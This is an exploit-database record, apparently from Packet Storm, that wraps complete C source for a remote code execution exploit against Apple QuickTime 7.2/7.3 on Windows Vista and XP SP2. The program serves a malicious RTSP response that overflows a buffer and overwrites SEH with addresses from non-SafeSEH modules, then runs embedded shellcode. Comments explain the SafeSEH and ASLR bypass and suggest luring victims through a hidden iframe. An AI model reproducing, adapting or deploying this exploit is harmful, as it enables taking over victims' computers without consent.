aquick-rstp.txt

{"hash": "965a3f508b89a2056e031650d7f40ba38e7514c503c37ccdb0744b6901a769e8", "sourceHref": "https://packetstormsecurity.com/files/download/61217/aquick-rstp.txt", "title": "aquick-rstp.txt", "id": "PACKETSTORM:61217", "published": "2007-11-27T00:00:00", "description": "", "modified": "2007-11-27T00:00:00", "sourceData": "`/* \n============================================================= \nApple Quicktime (Vista/XP RSTP Response) Remote Code Exec \n============================================================= \nDiscovered by: h07 \nAuthor: InTeL \n*Tested on: \n- Quicktime 7.3 on Windows Vista, Result: SEH Overwrite, Code Exec \n- Quicktime 7.2 on Windows Vista, Result: SEH Overwrite. Code Exec \n \n- Quicktime 7.3 on Windows XP Pro SP2, Result: SEH Overwrite, Code Exec \n- Quicktime 7.2 on Windows XP Pro SP2, Result: SEH Overwrite, Code Exec \n \n \nNotes: \n[*] On Vista the QuickTimePlayer and the .gtx modules dont have ASLR enabled, NO RANDOMIZATION :) \n[*]All the 7.3 and 7.2 DLL modules are SafeSEH enabled, except for the .gtx modules, that is how u bypass the SEH \nRestrictions in XP and in Vista!! so we use Addys from there. \n[*]There are ALOT of filtered characters so choose your shellcode wisely or you will run into Access Violations \nSince I didnt feel like wasting my time going through all the filtered Characters, go through it yourself. \n- Here are some \\x4b, \\x59, \\x79 \n[*]I did hit my shellcode but b/c i havent gone through all the filtered characters i got an Access Violation \nin the shellcode \n[*]Can be easily modified to keep accepting clients with a lil modding, do it yourself u noobs \n \n[***]Here is an example of how to embed a streaming the quicktime redirection to the RTSP exploit. \nhttp://quicktime.tc.columbia.edu/users/iml/movies/mtest.html \ncough use w/ an iframe cough \n \nShoutz: UIA, u kno who u ppl are \n*/ \n \n \n#include <winsock2.h> \n#include <stdio.h> \n#include <stdlib.h> \n#include <string.h> \n#pragma comment(lib,\"wsock32.lib\") \n \nint info(); \n \n#define port 554 \n \nchar header_part1[] = \n\"RTSP/1.0 200 OK\\r\\n\" \n\"CSeq: 1\\r\\n\" \n\"Date: 0x00 :P\\r\\n\" \n\"Content-Base: rtsp://0.0.0.0/1.mp3/\\r\\n\" \n\"Content-Type: \"; \n \nchar header_part2[] = \n\"Content-Length: \"; \n \nchar body[] = \n\"v=0\\r\\n\" \n\"o=- 16689332712 1 IN IP4 0.0.0.0\\r\\n\" \n\"s=MPEG-1 or 2 Audio, streamed by the PoC Exploit\\r\\n\" \n\"i=1.mp3\\r\\n\" \"t=0 0\\r\\n\" \n\"a=tool:ciamciaramcia\\r\\n\" \n\"a=type:broadcast\\r\\n\" \n\"a=control:*\\r\\n\" \n\"a=range:npt=0-213.077\\r\\n\" \n\"a=x-qt-text-nam:MPEG-1 or 2 Audio, streamed by the PoC Exploit \\r\\n\" \n\"a=x-qt-text-inf:1.mp3\\r\\n\" \n\"m=audio 0 RTP/AVP 14\\r\\n\" \n\"c=IN IP4 0.0.0.0\\r\\n\" \n\"a=control:track1\\r\\n\"; \n \n//Place Your Shellcode here but keep the name \nchar scode[] = \n\"\\xfc\\xbb\\x9a\\x15\\x38\\x92\\xeb\\x0c\\x5e\\x56\\x31\\x1e\\xad\\x01\\xc3\\x85\" \n\"\\xc0\\x75\\xf7\\xc3\\xe8\\xef\\xff\\xff\\xff\\x66\\xfd\\x7c\\x92\\x96\\xfe\\xf7\" \n\"\\xd7\\xaa\\x75\\x7b\\xdd\\xaa\\x88\\x6b\\x56\\x05\\x93\\xf8\\x36\\xb9\\xa2\\x15\" \n\"\\x81\\x32\\x90\\x62\\x13\\xaa\\xe8\\xb4\\x8d\\x9e\\x8f\\xf5\\xda\\xd9\\x4e\\x3f\" \n\"\\x2f\\xe4\\x92\\x2b\\xc4\\xdd\\x46\\x88\\x21\\x54\\x82\\x5b\\x76\\xb2\\x4d\\xb7\" \n\"\\xef\\x31\\x41\\x0c\\x7b\\x1a\\x46\\x93\\x90\\x2f\\x6a\\x18\\x67\\xc4\\x1a\\x42\" \n\"\\x4c\\x1e\\xde\\x4a\\x4c\\x7a\\x6b\\xec\\x7c\\x07\\xab\\x95\\x70\\x8c\\x6c\\x6a\" \n\"\\x02\\xe2\\x70\\xdf\\x9f\\x6a\\x81\\xf4\\xa9\\xe1\\x11\\xba\\xaa\\xf5\\x11\\x30\" \n\"\\xc2\\xc9\\x4e\\x77\\xe5\\x51\\x27\\xfe\\xf1\\x12\\x07\\x7b\\x52\\x7c\\x78\\xf6\" \n\"\\x56\\x23\\x10\\x9f\\xa9\\x51\\xee\\xc8\\xaa\\x82\\x9d\\x93\\x33\\x29\\x06\\x35\" \n\"\\xc8\\x9f\\xa3\\xbd\\x55\\xdf\\x2b\\x3e\\x96\\xdf\\x2b\\x3e\\x96\"; \n \n \nint main(int argc, char *argv[]) \n{ \nchar evilbuf[5200], recvbuf[512]; \nchar *strptr = NULL; \nchar contentlength[] = \"327\"; \nint i, pos; \nstruct sockaddr_in saddr; \nWSADATA wsaData; \nSOCKET sock, vicsock; \n \ninfo(); \nif(WSAStartup(MAKEWORD(2,2), &wsaData) != 0){ \nprintf(\"Unable to initialize Winsock \\n\"); \nexit(1); \n} \n \nif ((sock = socket(AF_INET, SOCK_STREAM, 0)) == INVALID_SOCKET) { \nprintf(\"Socket Error \\n\"); \nWSACleanup(); \nexit(1); \n} \n \nmemset(&saddr, 0, sizeof(saddr)); \nsaddr.sin_family = AF_INET; \nsaddr.sin_addr.s_addr = INADDR_ANY; \nsaddr.sin_port = htons(port); \n \nif (bind(sock, (struct sockaddr *)&saddr, sizeof(saddr)) == SOCKET_ERROR) { \nprintf(\"Bind Error \\r\\n\"); \nclosesocket(sock); \nWSACleanup(); \nexit(1); \n} \n \nif((listen(sock, SOMAXCONN)) == SOCKET_ERROR) { \nprintf(\"Listen Error \\r\\n\"); \nclosesocket(sock); \nWSACleanup(); \nexit(1); \n} \nprintf(\"[+] Listening on port: %d\\r\\n\", port); \nif((vicsock = accept(sock, NULL, NULL)) != INVALID_SOCKET) { \n \nprintf(\"[+]Victim Connected \\r\\n\"); \nmemset(recvbuf,0,sizeof(recvbuf)); \nrecv(vicsock, recvbuf, 512, 0); \n \nmemset(evilbuf, '\\0', sizeof(evilbuf)); \nstrcpy(evilbuf, header_part1); \n \n/*Identify Operating System - Goes Through Vista, XP and is able to detect Service Patchs so mod at will*/ \n \nif((strptr =strstr(recvbuf, \"6.0\")) != NULL) {// Vista \nstrptr = NULL; \n \nif((strptr =strstr(recvbuf, \"7.3\")) != NULL) { \nprintf(\"Victim is running Vista and QKTime Version 7.3\\r\\n\"); \npos = strlen(header_part1); \nfor(i = 1; i<=991;i++) { \nevilbuf[pos] = 'A'; \npos++; \n} \nstrcat(evilbuf, \"\\xeb\\x32\\x90\\x90\"); \nstrcat(evilbuf, \"\\x54\\x49\\x64\\x67\"); //pop ebx-pop-retbis in QuickTimeStreaming.gtx \npos += 8; \n} \nelse { \nstrptr = NULL; \nif((strptr =strstr(recvbuf, \"7.2\")) != NULL) { \nprintf(\"Victim is running Vista and QKTime Version 7.2\\r\\n\"); \npos = strlen(header_part1); \nfor(i = 1; i<=987;i++) { \nevilbuf[pos] = 'A'; \npos++; \n} \nstrcat(evilbuf, \"\\xeb\\x32\\x90\\x90\"); \nstrcat(evilbuf, \"\\xb4\\x45\\x59\\x67\");//pop ebx-pop-retbis in QuickTimeStreaming.gtx \npos += 8; \n} \n} \n} \nelse { //Win XP SP2 \nstrptr = NULL; \nif((strptr = strstr(recvbuf, \"5.1\")) != NULL) { \nstrptr = NULL; \nif((strptr =strstr(recvbuf, \"Pack 2\")) != NULL) { \nstrptr = NULL; \nif((strptr =strstr(recvbuf, \"7.3\")) != NULL) { \nprintf(\"Victim is running XP SP2 and QKTime Version 7.3\\r\\n\"); \npos = strlen(header_part1); \nfor(i = 1; i<=991;i++) { \nevilbuf[pos] = 'A'; \npos++; \n} \nstrcat(evilbuf, \"\\xeb\\x32\\x90\\x90\"); \nstrcat(evilbuf, \"\\x54\\x49\\x64\\x67\"); //pop ebx-pop-retbis in QuickTimeStreaming.gtx \npos += 8; \n} \nelse{ \nstrptr = NULL; \nif((strptr =strstr(recvbuf, \"7.2\")) != NULL) { \nprintf(\"Victim is running XP SP2 and QKTime Version 7.2\\r\\n\"); \npos = strlen(header_part1); \nfor(i = 1; i<=987;i++) { \nevilbuf[pos] = 'A'; \npos++; \n} \nstrcat(evilbuf, \"\\xeb\\x32\\x90\\x90\"); \nstrcat(evilbuf, \"\\xb4\\x45\\x59\\x67\");//pop ebx-pop-retbis in QuickTimeStreaming.gtx \npos += 8; \n} \n} \n} \n} \nelse { \nprintf(\"[-] Not a Valid Target, Shutting Down\"); \nclosesocket(vicsock); \nclosesocket(sock); \nWSACleanup(); \nexit(1); \n} \n} \n \nfor(i=0; i<200;i++) { \nevilbuf[pos] = '\\x90'; \npos++; \n} \nfor(i=0; i<strlen(scode);i++){ \nevilbuf[pos] = scode[i]; \npos++; \n} \nint rest = 4096-(200+strlen(scode)); \nfor(i=0; i<rest;i++) { \nevilbuf[pos] = '\\x90'; \npos++; \n} \n \n \nstrcat(evilbuf, \"\\r\\n\"); \npos +=2; \nfor(i = 0; i<sizeof(header_part2);i++) { \nevilbuf[pos] = header_part2[i]; \npos++; \n} \nstrcat(evilbuf, contentlength); \nstrcat(evilbuf, \"\\r\\n\"); \nSleep(1); \nstrcat(evilbuf, \"\\r\\n\"); \npos +=8; \nstrcat(evilbuf, body); \nprintf(\"%s\", evilbuf); \n \nprintf(\"[+] Evil Packet Generated \\r\\n\"); \nif(send(vicsock, evilbuf, strlen(evilbuf), 0) != SOCKET_ERROR) \nprintf(\"[+] Evil Packet Sent \\r\\n\"); \nelse \nprintf(\"[-] Evil Packet Sending Failed \\r\\n\"); \n \nclosesocket(vicsock); \nclosesocket(sock); \nWSACleanup(); \n} \nelse { \nprintf(\"Accept failed\"); \nclosesocket(sock); \nWSACleanup(); \n} \nreturn 0; \n} \n \n \nint info() \n{ \nprintf(\"[+]Apple Quicktime (Vista/XP Sp2 RTSP RESPONSE) Code Exec Exploit\\r\\n\"); \nprintf(\"[+]Author: InTeL\\r\\n\"); \nprintf(\"[+]Tested on:\\r\\n\\t- Quicktime 7.3 on Windows Vista, Result: SEH Overwrite, Code Exec\\r\\n\\t- Quicktime 7.2 on Windows Vista, Result: SEH Overwrite. Code Exec\\r\\n\\t- Quicktime 7.3 on Windows XP Pro SP2, Result: SEH Overwrite, Code Exec\\r\\n\\t- Quicktime 7.2 on Windows XP Pro SP2, Result: SEH Overwrite, Code Exec\\r\\n\"); \nprintf(\"[+]Shout to: UIA, you kno who u ppl are\\r\\n\\r\\n\"); \n \nreturn 0; \n} \n \n \n`\n", "reporter": "InTeL", "hashmap": [{"key": "bulletinFamily", "hash": "708697c63f7eb369319c6523380bdf7a"}, {"key": "cvelist", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cvss", "hash": "d4be9c4fc84262b4f39f89565918568f"}, {"key": "description", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "href", "hash": "69ad4477f016f2fd41003009fa539383"}, {"key": "modified", "hash": "4d133e253844e85ac5fc7d7940381916"}, {"key": "objectVersion", "hash": "56765472680401499c79732468ba4340"}, {"key": "published", "hash": "4d133e253844e85ac5fc7d7940381916"}, {"key": "references", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "reporter", "hash": "9cc3ccce61a9a6724ab97cb251795e6a"}, {"key": "sourceData", "hash": "1c72d2cae6609313c54f3ffc53df97d7"}, {"key": "sourceHref", "hash": "b550e81c82a49bf9c6e0e3d162077690"}, {"key": "title", "hash": "34a738c6b7eb166a1e3f76f137bb3059"}, {"key": "type", "hash": "6466ca3735f647eeaed965d9e71bd35d"}], "cvss": {"vector": "NONE", "score": 0}, "references": [], "type": "packetstorm", "cvelist": [], "history": [], "bulletinFamily": "exploit", "objectVersion": "1.2", "edition": 1, "href": "https://packetstormsecurity.com/files/61217/aquick-rstp.txt.html", "lastseen": "2016-11-03T10:27:11", "viewCount": 0, "enchantments": {"vulnersScore": 9.0}}